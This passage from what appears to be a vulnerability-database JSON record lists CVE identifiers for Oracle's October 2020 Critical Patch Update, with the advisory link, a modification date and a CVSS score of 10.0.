"CVE-2020-14763", "CVE-2020-14764", "CVE-2020-14765", "CVE-2020-14766", "CVE-2020-14767", "CVE-2020-14768", "CVE-2020-14769", "CVE-2020-14770", "CVE-2020-14771", "CVE-2020-14772", "CVE-2020-14773", "CVE-2020-14774", "CVE-2020-14775", "CVE-2020-14776", "CVE-2020-14777", "CVE-2020-14778", "CVE-2020-14779", "CVE-2020-14780", "CVE-2020-14781", "CVE-2020-14782", "CVE-2020-14783", "CVE-2020-14784", "CVE-2020-14785", "CVE-2020-14786", "CVE-2020-14787", "CVE-2020-14788", "CVE-2020-14789", "CVE-2020-14790", "CVE-2020-14791", "CVE-2020-14792", "CVE-2020-14793", "CVE-2020-14794", "CVE-2020-14795", "CVE-2020-14796", "CVE-2020-14797", "CVE-2020-14798", "CVE-2020-14799", "CVE-2020-14800", "CVE-2020-14801", "CVE-2020-14802", "CVE-2020-14803", "CVE-2020-14804", "CVE-2020-14805", "CVE-2020-14806", "CVE-2020-14807", "CVE-2020-14808", "CVE-2020-14809", "CVE-2020-14810", "CVE-2020-14811", "CVE-2020-14812", "CVE-2020-14813", "CVE-2020-14814", "CVE-2020-14815", "CVE-2020-14816", "CVE-2020-14817", "CVE-2020-14818", "CVE-2020-14819", "CVE-2020-14820", "CVE-2020-14821", "CVE-2020-14822", "CVE-2020-14823", "CVE-2020-14824", "CVE-2020-14825", "CVE-2020-14826", "CVE-2020-14827", "CVE-2020-14828", "CVE-2020-14829", "CVE-2020-14830", "CVE-2020-14831", "CVE-2020-14832", "CVE-2020-14833", "CVE-2020-14834", "CVE-2020-14835", "CVE-2020-14836", "CVE-2020-14837", "CVE-2020-14838", "CVE-2020-14839", "CVE-2020-14840", "CVE-2020-14841", "CVE-2020-14842", "CVE-2020-14843", "CVE-2020-14844", "CVE-2020-14845", "CVE-2020-14846", "CVE-2020-14847", "CVE-2020-14848", "CVE-2020-14849", "CVE-2020-14850", "CVE-2020-14851", "CVE-2020-14852", "CVE-2020-14853", "CVE-2020-14854", "CVE-2020-14855", "CVE-2020-14856", "CVE-2020-14857", "CVE-2020-14858", "CVE-2020-14859", "CVE-2020-14860", "CVE-2020-14861", "CVE-2020-14862", "CVE-2020-14863", "CVE-2020-14864", "CVE-2020-14865", "CVE-2020-14866", "CVE-2020-14867", "CVE-2020-14868", "CVE-2020-14869", "CVE-2020-14870", "CVE-2020-14871", "CVE-2020-14872", "CVE-2020-14873", "CVE-2020-14875", "CVE-2020-14876", "CVE-2020-14877", "CVE-2020-14878", "CVE-2020-14879", "CVE-2020-14880", "CVE-2020-14881", "CVE-2020-14882", "CVE-2020-14883", "CVE-2020-14884", "CVE-2020-14885", "CVE-2020-14886", "CVE-2020-14887", "CVE-2020-14888", "CVE-2020-14889", "CVE-2020-14890", "CVE-2020-14891", "CVE-2020-14892", "CVE-2020-14893", "CVE-2020-14894", "CVE-2020-14895", "CVE-2020-14896", "CVE-2020-14897", "CVE-2020-14898", "CVE-2020-14899", "CVE-2020-14900", "CVE-2020-14901", "CVE-2020-15358", "CVE-2020-15389", "CVE-2020-1730", "CVE-2020-1935", "CVE-2020-1938", "CVE-2020-1941", "CVE-2020-1945", "CVE-2020-1950", "CVE-2020-1951", "CVE-2020-1953", "CVE-2020-1954", "CVE-2020-1967", "CVE-2020-2555", "CVE-2020-3235", "CVE-2020-3909", "CVE-2020-4051", "CVE-2020-5397", "CVE-2020-5398", "CVE-2020-5407", "CVE-2020-5408", "CVE-2020-7067", "CVE-2020-8172", "CVE-2020-8174", "CVE-2020-8840", "CVE-2020-9281", "CVE-2020-9327", "CVE-2020-9409", "CVE-2020-9410", "CVE-2020-9484", "CVE-2020-9488", "CVE-2020-9489", "CVE-2020-9490", "CVE-2020-9546", "CVE-2020-9547", "CVE-2020-9548"], "modified": "2020-12-08T00:00:00", "id": "ORACLE:CPUOCT2020", "href": "https://www.oracle.com/security-alerts/cpuoct2020.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}